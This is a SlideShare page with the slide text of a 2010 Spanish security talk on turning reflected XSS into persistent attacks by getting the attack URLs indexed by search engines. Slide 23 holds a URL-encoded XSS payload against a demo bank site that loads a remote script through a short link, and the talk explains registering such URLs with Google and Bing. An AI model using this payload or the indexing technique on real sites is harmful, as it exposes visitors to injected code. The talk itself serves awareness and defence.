Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.

XSS Google Persistentes

Conferencia impartida en el Asegúr@IT Camp 2, en el año 2010, por Chema Alonso sobre cómo se pueden indexar XSS Reflejados para convertirlos en XSS Google Persistentes. El vídeo de la conferencia está en la siguiente URL: https://www.youtube.com/watch?v=0KYnnITHLNU

  • Soyez le premier à commenter

XSS Google Persistentes

  1. 1. Ataques XSS Google Persistentes Chema Alonso
  2. 2. Buscadores como Arma Búsqueda de información Búsqueda de vulnerabilidades Distribución de malware Ejecución de comandos Ataques XSS
  3. 3. Búsqueda de información
  4. 4. Búsqueda de passwords
  5. 5. Distribución de malware en Apple.com
  6. 6. BrowserShots
  7. 7. Caché de ataques SQL
  8. 8. Servicios de PING
  9. 9. Análisis Forense
  10. 10. XSS Persistentes Se inyectan en el repositorio de datos de la aplicación Bases de datos Correos Web Tienen cierto nivel de complejidad Tienen que ocultarse a los ojos de los administradores Están en los datos Pueden tener consecuencias inesperadas
  11. 11. XSS No Persistentes
  12. 12. ¿Cómo se descubren? Pentesting Acunetix free-edition El blog de Eduardo Abril Just Googling
  13. 13. FBI y sus XSS
  14. 14. NASA y XSS
  15. 15. Dominio .mil
  16. 16. Oracle
  17. 17. Google
  18. 18. «Last-minute» XSS
  19. 19. Scripts de Búsqueda
  20. 20. The Facts Google Indexa URLs con XSS Un alto porcentaje de usuarios llega por buscadores
  21. 21. The Facts… Bueno… «buscadores means Google»
  22. 22. Conclusión Se puede dar de alta una URL con un XSS no persistente Servicio de alta de URLs Enlazado en una web indexada Se puede posicionar con técnicas Black SEO
  23. 23. Bank Of Maligno Web «copia» de Bank of América XSS No Persistente en search.aspx URL de ataque: http://bankofmaligno.informatica64.com/search.aspx?S= %22%68%6F%6C%61%3C%73%63%72%69%70%74% 20%66%6F%72%3D%77%69%6E%64%6F%77%20%65 %76%65%6E%74%3D%6F%6E%6C%6F%61%64%20% 73%72%63%3D%22%68%74%74%70%3A%2F%2F%62 %69%74%2E%6C%79%2F%64%63%73%65%4E%49% 22%3E%3C%2F%73%63%72%69%70%74%3E Dada de alta en Google & Bing manualmente Dada de alta en Blog «Un informático en el lado del mal»
  24. 24. Bank Of Maligno
  25. 25. Bank Of Maligno
  26. 26. Bank Of Maligno
  27. 27. Conclusiones No hay filtrado de URLs Ataques SQL Injection Ataques XSS Indexar un XSS en Google (u otro buscador) es convertirlo en un % Persistente Protección SEO + Protección robots.txt
  28. 28. ¿Preguntas? Chema Alonso chema@informatica64.com http://twitter.com/chemaalonso http://www.informatica64.com Blogs http://www.elladodelmal.com http://www.windowstecnico.com http://www.seguridadapple.com http://www.forefront-es.com http://www.puntocompartido.com/blogshare http://www.exchangespain.com

    Soyez le premier à commenter

    Identifiez-vous pour voir les commentaires

  • xirin77

    Jan. 7, 2015
  • PedroGomezLozano

    Apr. 30, 2015
  • sarunasgrigaliunas

    Jun. 7, 2015

Conferencia impartida en el Asegúr@IT Camp 2, en el año 2010, por Chema Alonso sobre cómo se pueden indexar XSS Reflejados para convertirlos en XSS Google Persistentes. El vídeo de la conferencia está en la siguiente URL: https://www.youtube.com/watch?v=0KYnnITHLNU

Vues

Nombre de vues

2 148

Sur Slideshare

0

À partir des intégrations

0

Nombre d'intégrations

21

Actions

Téléchargements

36

Partages

0

Commentaires

0

Mentions J'aime

3

×